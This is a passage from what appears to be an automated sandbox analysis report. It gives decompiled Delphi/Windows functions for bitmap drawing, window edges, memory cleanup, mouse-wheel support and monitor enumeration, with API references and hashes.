                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: ReleaseDC.USER32 ref: 00424CD8
                                                                        • SelectPalette.GDI32(?,?,000000FF), ref: 00424606
                                                                        • RealizePalette.GDI32(?), ref: 00424615
                                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 00424627
                                                                        • GetDeviceCaps.GDI32(?,0000000E), ref: 00424636
                                                                        • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042466A
                                                                        • SetStretchBltMode.GDI32(?,00000004), ref: 00424678
                                                                        • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424690
                                                                        • SetStretchBltMode.GDI32(00000000,00000003), ref: 004246AD
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0042470D
                                                                        • SelectObject.GDI32(?,?), ref: 00424722
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424781
                                                                        • DeleteDC.GDI32(00000000), ref: 00424790
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                        • String ID:
                                                                        • API String ID: 2414602066-0
                                                                        • Opcode ID: acb8932e995dfd2a28a5d97402ba6a6ed7e5f22b2b10c2d69e81ccc22d0cc951
                                                                        • Instruction ID: 9c0590f5a5351f0b339d81a561568dd9393c85642e681a1d1bb2e02d323cf42c
                                                                        • Opcode Fuzzy Hash: acb8932e995dfd2a28a5d97402ba6a6ed7e5f22b2b10c2d69e81ccc22d0cc951
                                                                        • Instruction Fuzzy Hash: D4716AB5B00215AFDB10EFA9D985F5ABBF8EB49304F51856AB508E7381D638ED00CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E00420B38(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				struct HBITMAP__* _v20;
                                                                        				struct HDC__* _v24;
                                                                        				struct HDC__* _v28;
                                                                        				struct HDC__* _v32;
                                                                        				int _v48;
                                                                        				int _v52;
                                                                        				void _v56;
                                                                        				void* _t78;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr _t86;
                                                                        				void* _t91;
                                                                        				void* _t93;
                                                                        				void* _t94;
                                                                        				intOrPtr _t95;
                                                                        
                                                                        				_t93 = _t94;
                                                                        				_t95 = _t94 + 0xffffffcc;
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_t77 = __ecx;
                                                                        				_v8 = __eax;
                                                                        				_v28 = CreateCompatibleDC(0);
                                                                        				_v32 = CreateCompatibleDC(0);
                                                                        				_push(_t93);
                                                                        				_push(0x420c86);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t95;
                                                                        				GetObjectA(_v8, 0x18,  &_v56);
                                                                        				if(__ecx == 0) {
                                                                        					_v24 = GetDC(0);
                                                                        					if(_v24 == 0) {
                                                                        						E00420A80(_t77);
                                                                        					}
                                                                        					_push(_t93);
                                                                        					_push(0x420bf5);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t95;
                                                                        					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
                                                                        					if(_v20 == 0) {
                                                                        						E00420A80(_t77);
                                                                        					}
                                                                        					_pop(_t85);
                                                                        					 *[fs:eax] = _t85;
                                                                        					_push(0x420bfc);
                                                                        					return ReleaseDC(0, _v24);
                                                                        				} else {
                                                                        					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
                                                                        					if(_v20 != 0) {
                                                                        						_t78 = SelectObject(_v28, _v8);
                                                                        						_t91 = SelectObject(_v32, _v20);
                                                                        						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                                                        						if(_t78 != 0) {
                                                                        							SelectObject(_v28, _t78);
                                                                        						}
                                                                        						if(_t91 != 0) {
                                                                        							SelectObject(_v32, _t91);
                                                                        						}
                                                                        					}
                                                                        					_pop(_t86);
                                                                        					 *[fs:eax] = _t86;
                                                                        					_push(E00420C8D);
                                                                        					DeleteDC(_v28);
                                                                        					return DeleteDC(_v32);
                                                                        				}
                                                                        			}





















                                                                        APIs
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00420B4F
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00420B59
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00420B79
                                                                        • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00420B90
                                                                        • GetDC.USER32(00000000), ref: 00420B9C
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00420BC9
                                                                        • ReleaseDC.USER32 ref: 00420BEF
                                                                        • SelectObject.GDI32(?,?), ref: 00420C0A
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C19
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00420C45
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C53
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C61
                                                                        • DeleteDC.GDI32(?), ref: 00420C77
                                                                        • DeleteDC.GDI32(?), ref: 00420C80
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                        • String ID:
                                                                        • API String ID: 644427674-0
                                                                        • Opcode ID: 92b6f5e0cc708ed8cb85c49a1690da75df71d20a8e8c716397063333557d3b77
                                                                        • Instruction ID: 6c023867643c450f6ef70e7d5508629062c5f15d3a4c00019323062e5ea54a1e
                                                                        • Opcode Fuzzy Hash: 92b6f5e0cc708ed8cb85c49a1690da75df71d20a8e8c716397063333557d3b77
                                                                        • Instruction Fuzzy Hash: 9E4120B1E44215AFDB10EBE5DC46FAFB7FCEB08704F514426B605F7281C678A9408B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 52%
                                                                        			E0043DA84(intOrPtr* __eax, intOrPtr __edx) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr _v12;
                                                                        				struct HDC__* _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct tagRECT _v48;
                                                                        				void* _v64;
                                                                        				intOrPtr* _t190;
                                                                        				intOrPtr* _t193;
                                                                        				void* _t202;
                                                                        				intOrPtr _t209;
                                                                        				signed int _t226;
                                                                        				void* _t229;
                                                                        				void* _t231;
                                                                        				intOrPtr _t232;
                                                                        
                                                                        				_t229 = _t231;
                                                                        				_t232 = _t231 + 0xffffffc4;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                                                        					_v16 = GetWindowDC(E0043CC2C(_v8));
                                                                        					_push(_t229);
                                                                        					_push(0x43dcea);
                                                                        					_push( *[fs:edx]);
                                                                        					 *[fs:edx] = _t232;
                                                                        					GetClientRect(E0043CC2C(_v8),  &_v32);
                                                                        					GetWindowRect(E0043CC2C(_v8),  &_v48);
                                                                        					MapWindowPoints(0, E0043CC2C(_v8),  &_v48, 2);
                                                                        					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                                                        					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					if( *(_v8 + 0x165) != 0) {
                                                                        						_t202 = 0;
                                                                        						if( *(_v8 + 0x163) != 0) {
                                                                        							_t202 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                                                        						}
                                                                        						if( *(_v8 + 0x164) != 0) {
                                                                        							_t202 = _t202 +  *((intOrPtr*)(_v8 + 0x168));
                                                                        						}
                                                                        						_t226 = GetWindowLongA(E0043CC2C(_v8), 0xfffffff0);
                                                                        						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                                                        							_v48.left = _v48.left - _t202;
                                                                        						}
                                                                        						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                                                        							_v48.top = _v48.top - _t202;
                                                                        						}
                                                                        						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                                                        							_v48.right = _v48.right + _t202;
                                                                        						}
                                                                        						if((_t226 & 0x00200000) != 0) {
                                                                        							_t193 =  *0x495998; // 0x496a9c
                                                                        							_v48.right = _v48.right +  *((intOrPtr*)( *_t193))(0x14);
                                                                        						}
                                                                        						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                                                        							_v48.bottom = _v48.bottom + _t202;
                                                                        						}
                                                                        						if((_t226 & 0x00100000) != 0) {
                                                                        							_t190 =  *0x495998; // 0x496a9c
                                                                        							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t190))(0x15);
                                                                        						}
                                                                        						DrawEdge(_v16,  &_v48,  *(0x47a978 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x47a988 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x47a998 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x47a9a8 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                                                        					}
                                                                        					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                                                        					FillRect(_v16,  &_v48, E0041FC84( *((intOrPtr*)(_v8 + 0x170))));
                                                                        					_pop(_t209);
                                                                        					 *[fs:eax] = _t209;
                                                                        					_push(0x43dcf1);
                                                                        					return ReleaseDC(E0043CC2C(_v8), _v16);
                                                                        				} else {
                                                                        					return  *((intOrPtr*)( *_v8 - 0x10))();
                                                                        				}
                                                                        			}


















                                                                        APIs
                                                                        • GetWindowDC.USER32(00000000), ref: 0043DAB8
                                                                        • GetClientRect.USER32 ref: 0043DADB
                                                                        • GetWindowRect.USER32 ref: 0043DAED
                                                                        • MapWindowPoints.USER32 ref: 0043DB03
                                                                        • OffsetRect.USER32(?,?,?), ref: 0043DB18
                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043DB31
                                                                        • InflateRect.USER32(?,00000000,00000000), ref: 0043DB4F
                                                                        • GetWindowLongA.USER32 ref: 0043DBA5
                                                                        • DrawEdge.USER32(?,?,00000000,00000008), ref: 0043DC71
                                                                        • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043DC8A
                                                                        • OffsetRect.USER32(?,?,?), ref: 0043DCA9
                                                                        • FillRect.USER32 ref: 0043DCC5
                                                                        • ReleaseDC.USER32 ref: 0043DCE4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
                                                                        • String ID:
                                                                        • API String ID: 3115931838-0
                                                                        • Opcode ID: 18cc17be9f14d87cf749883569c99a34ad1c3fb8269440956ae4272b69828a85
                                                                        • Instruction ID: 7968770457f43ada0f31e19ad590de613830df88c21d9f0d7a04e4ea0399ff5a
                                                                        • Opcode Fuzzy Hash: 18cc17be9f14d87cf749883569c99a34ad1c3fb8269440956ae4272b69828a85
                                                                        • Instruction Fuzzy Hash: E4812871E00208AFDB01DBA8D985EEEB7F9AF09314F1540A6F518F7252C779AE44CB24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E0041FEC0(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr* _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				int _v24;
                                                                        				long _v28;
                                                                        				long _v32;
                                                                        				struct HDC__* _v36;
                                                                        				intOrPtr* _v40;
                                                                        				void* _v44;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t116;
                                                                        				void* _t124;
                                                                        				int* _t197;
                                                                        				intOrPtr _t205;
                                                                        				intOrPtr _t209;
                                                                        				intOrPtr _t210;
                                                                        				intOrPtr _t211;
                                                                        				int _t217;
                                                                        				int* _t219;
                                                                        				void* _t222;
                                                                        				void* _t224;
                                                                        				intOrPtr _t225;
                                                                        
                                                                        				_t199 = __ecx;
                                                                        				_t222 = _t224;
                                                                        				_t225 = _t224 + 0xffffffd8;
                                                                        				_v12 = __ecx;
                                                                        				_t219 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t197 = _a8;
                                                                        				if(_v12 != 0) {
                                                                        					E00420398(_v8);
                                                                        					 *[fs:eax] = _t225;
                                                                        					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x420166, _t222);
                                                                        					_t205 =  *0x420178; // 0x9
                                                                        					E00420804(_v8, __ecx, _t205);
                                                                        					E00420398(E00424894(_v12));
                                                                        					_push(_t222);
                                                                        					_push(0x420141);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t225;
                                                                        					_v20 = _t219[2] -  *_t219;
                                                                        					_v24 = _t219[3] - _t219[1];
                                                                        					_t217 = _t197[2] -  *_t197;
                                                                        					_v16 = _t197[3] - _t197[1];
                                                                        					if(E00424980(_v12, _t199) != _a4) {
                                                                        						_v40 = E004242CC(1);
                                                                        						_t199 =  *_v40;
                                                                        						 *((intOrPtr*)( *_v40 + 8))();
                                                                        						E00424AF4(_v40, _a4, __eflags);
                                                                        						_t116 = E00424894(_v40);
                                                                        						_t209 =  *0x42017c; // 0x1
                                                                        						E00420804(_t116,  *_v40, _t209);
                                                                        						_v36 =  *((intOrPtr*)(E00424894(_v40) + 4));
                                                                        						__eflags = 0;
                                                                        						_v44 = 0;
                                                                        					} else {
                                                                        						_v40 = 0;
                                                                        						_v44 =  *((intOrPtr*)( *_v12 + 0x68))();
                                                                        						_v36 = CreateCompatibleDC(0);
                                                                        						_v44 = SelectObject(_v36, _v44);
                                                                        					}
                                                                        					_push(_t222);
                                                                        					_push(0x42011f);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t225;
                                                                        					_t124 = E00424894(_v12);
                                                                        					_t210 =  *0x42017c; // 0x1
                                                                        					E00420804(_t124, _t199, _t210);
                                                                        					if(E0041FD64( *((intOrPtr*)(_v8 + 0x14))) != 1) {
                                                                        						StretchBlt( *(_v8 + 4),  *_t219, _t219[1], _v20, _v24,  *(E00424894(_v12) + 4),  *_t197, _t197[1], _t217, _v16, 0xcc0020);
                                                                        						_v32 = SetTextColor( *(_v8 + 4), 0);
                                                                        						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
                                                                        						StretchBlt( *(_v8 + 4),  *_t219, _t219[1], _v20, _v24, _v36,  *_t197, _t197[1], _t217, _v16, 0xe20746);
                                                                        						SetTextColor( *(_v8 + 4), _v32);
                                                                        						SetBkColor( *(_v8 + 4), _v28);
                                                                        					} else {
                                                                        						E00420CCC( *(_v8 + 4), _t197, _t219[1],  *_t219, _t217, _t219, _t197[1],  *_t197, _v36, _v16, _t217, _t197[1],  *_t197,  *(E00424894(_v12) + 4), _v24, _v20);
                                                                        					}
                                                                        					_pop(_t211);
                                                                        					 *[fs:eax] = _t211;
                                                                        					_push(E00420126);
                                                                        					if(_v40 == 0) {
                                                                        						__eflags = _v44;
                                                                        						if(_v44 != 0) {
                                                                        							SelectObject(_v36, _v44);
                                                                        						}
                                                                        						return DeleteDC(_v36);
                                                                        					} else {
                                                                        						return E004035DC(_v40);
                                                                        					}
                                                                        				}
                                                                        				return __eax;
                                                                        			}






























                                                                        APIs
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203A0
                                                                          • Part of subcall function 00420398: RtlLeaveCriticalSection.KERNEL32(00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203AD
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00000038,00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203B6
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0041FF63
                                                                        • SelectObject.GDI32(?,?), ref: 0041FF73
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0042006B
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00420079
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 0042008D
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 004200C0
                                                                        • SetTextColor.GDI32(?,?), ref: 004200D0
                                                                        • SetBkColor.GDI32(?,?), ref: 004200E0
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420110
                                                                        • DeleteDC.GDI32(?), ref: 00420119
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Color$CriticalSection$EnterObjectSelectStretchText$CompatibleCreateDeleteLeave
                                                                        • String ID: DA
                                                                        • API String ID: 675119849-2080325668
                                                                        • Opcode ID: a305b6964adfa08e3166ec0bdd060209ec18989792a7513b38a99bc9b876a6e0
                                                                        • Instruction ID: 352f120f49c7ce31c8e928e488b0f771bd528acb35d7a7b452884ca02f7a62cb
                                                                        • Opcode Fuzzy Hash: a305b6964adfa08e3166ec0bdd060209ec18989792a7513b38a99bc9b876a6e0
                                                                        • Instruction Fuzzy Hash: 6791B775A00118AFCB50EFA9D985D9EB7F8EF0D304B5584AAF508E7352C635ED40CB28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E00401B64() {
                                                                        				void* _t2;
                                                                        				void* _t3;
                                                                        				void* _t14;
                                                                        				intOrPtr* _t19;
                                                                        				intOrPtr _t23;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t28;
                                                                        
                                                                        				_t26 = _t28;
                                                                        				if( *0x4965bc == 0) {
                                                                        					return _t2;
                                                                        				} else {
                                                                        					_push(_t26);
                                                                        					_push("�1!");
                                                                        					_push( *[fs:edx]);
                                                                        					 *[fs:edx] = _t28;
                                                                        					if( *0x496049 != 0) {
                                                                        						_push(0x4965c4);
                                                                        						L004013FC();
                                                                        					}
                                                                        					 *0x4965bc = 0;
                                                                        					_t3 =  *0x49661c; // 0x7e2258
                                                                        					LocalFree(_t3);
                                                                        					 *0x49661c = 0;
                                                                        					_t19 =  *0x4965e4; // 0x7e388c
                                                                        					while(_t19 != 0x4965e4) {
                                                                        						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                                                        						_t19 =  *_t19;
                                                                        					}
                                                                        					E00401464(0x4965e4);
                                                                        					E00401464(0x4965f4);
                                                                        					E00401464(0x496620);
                                                                        					_t14 =  *0x4965dc; // 0x7e3258
                                                                        					while(_t14 != 0) {
                                                                        						 *0x4965dc =  *_t14;
                                                                        						LocalFree(_t14);
                                                                        						_t14 =  *0x4965dc; // 0x7e3258
                                                                        					}
                                                                        					_pop(_t23);
                                                                        					 *[fs:eax] = _t23;
                                                                        					_push(0x401c41);
                                                                        					if( *0x496049 != 0) {
                                                                        						_push(0x4965c4);
                                                                        						L00401404();
                                                                        					}
                                                                        					_push(0x4965c4);
                                                                        					L0040140C();
                                                                        					return 0;
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,00000000,1!), ref: 00401B91
                                                                        • LocalFree.KERNEL32(007E2258,00000000,1!), ref: 00401BA3
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,007E2258,00000000,1!), ref: 00401BC2
                                                                        • LocalFree.KERNEL32(007E3258,?,00000000,00008000,007E2258,00000000,1!), ref: 00401C01
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,00401C41,007E2258,00000000,1!), ref: 00401C2A
                                                                        • RtlDeleteCriticalSection.KERNEL32(004965C4,00401C41,007E2258,00000000,1!), ref: 00401C34
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                        • String ID: X"~$X2~$l8~$|8~$1!
                                                                        • API String ID: 3782394904-4038627918
                                                                        • Opcode ID: 3a7b233517acf5c95cbb18c7fe32d53daa30e1684477b17213130cd6556bc65b
                                                                        • Instruction ID: 05849b501fd87baf2c0356682b7521c0f28bcc268fec1476372dd4ef7659d9e7
                                                                        • Opcode Fuzzy Hash: 3a7b233517acf5c95cbb18c7fe32d53daa30e1684477b17213130cd6556bc65b
                                                                        • Instruction Fuzzy Hash: 10118E706483806EEB11AB66AC81B167B999714718F17807BF404A66FAD67D9C40CB1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00407374(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                                                        				intOrPtr* _v8;
                                                                        				struct HWND__* _t19;
                                                                        				int* _t20;
                                                                        				int* _t26;
                                                                        				int* _t27;
                                                                        
                                                                        				_t26 = _t20;
                                                                        				_t27 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                                                        				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                                                        				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                                                                        				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                                                                        				if( *_t27 == 0 || _t19 == 0) {
                                                                        					 *_a8 = 0;
                                                                        				} else {
                                                                        					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                                                                        				}
                                                                        				if( *_t26 == 0 || _t19 == 0) {
                                                                        					 *_a4 = 3;
                                                                        				} else {
                                                                        					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                                                                        				}
                                                                        				return _t19;
                                                                        			}









                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                        • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                        • API String ID: 1416857345-3736581797
                                                                        • Opcode ID: 33887b9800c1c8701772067904d4d890eaa0bc031dc26d9606312377edf2b903
                                                                        • Instruction ID: 351a13b39c766bd10c055905373aadfc2257e8037effc2ac2d33f24fba4f34ad
                                                                        • Opcode Fuzzy Hash: 33887b9800c1c8701772067904d4d890eaa0bc031dc26d9606312377edf2b903
                                                                        • Instruction Fuzzy Hash: E1118270A08345AFE700AF65CC82B26B798EF45750F204476BD44AF3C1D6B86C41D76A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004277C4(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                                                        				struct tagPOINT _v12;
                                                                        				int _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct tagRECT _v48;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t60;
                                                                        				int _t61;
                                                                        				RECT* _t64;
                                                                        				struct HDC__* _t65;
                                                                        
                                                                        				_t64 = _a8;
                                                                        				_t65 = _a4;
                                                                        				if( *0x496acb != 0) {
                                                                        					_t61 = 0;
                                                                        					if(_a12 == 0) {
                                                                        						L14:
                                                                        						return _t61;
                                                                        					}
                                                                        					_v32.left = 0;
                                                                        					_v32.top = 0;
                                                                        					_v32.right = GetSystemMetrics(0);
                                                                        					_v32.bottom = GetSystemMetrics(1);
                                                                        					if(_t65 == 0) {
                                                                        						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                        							L13:
                                                                        							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                                                        						} else {
                                                                        							_t61 = 1;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        					_v16 = GetClipBox(_t65,  &_v48);
                                                                        					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                                                        						goto L14;
                                                                        					}
                                                                        					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                                                        					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                                                        						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                        							goto L13;
                                                                        						}
                                                                        						if(_v16 == 1) {
                                                                        							_t61 = 1;
                                                                        						}
                                                                        						goto L14;
                                                                        					} else {
                                                                        						goto L13;
                                                                        					}
                                                                        				}
                                                                        				 *0x496ab8 = E00427218(7, _t60,  *0x496ab8, _t64, _t65);
                                                                        				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                                                        				goto L14;
                                                                        			}
















                                                                        APIs
                                                                        • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004277FD
                                                                        • GetSystemMetrics.USER32 ref: 00427822
                                                                        • GetSystemMetrics.USER32 ref: 0042782D
                                                                        • GetClipBox.GDI32(?,?), ref: 0042783F
                                                                        • GetDCOrgEx.GDI32(?,?), ref: 0042784C
                                                                        • OffsetRect.USER32(?,?,?), ref: 00427865
                                                                        • IntersectRect.USER32 ref: 00427876
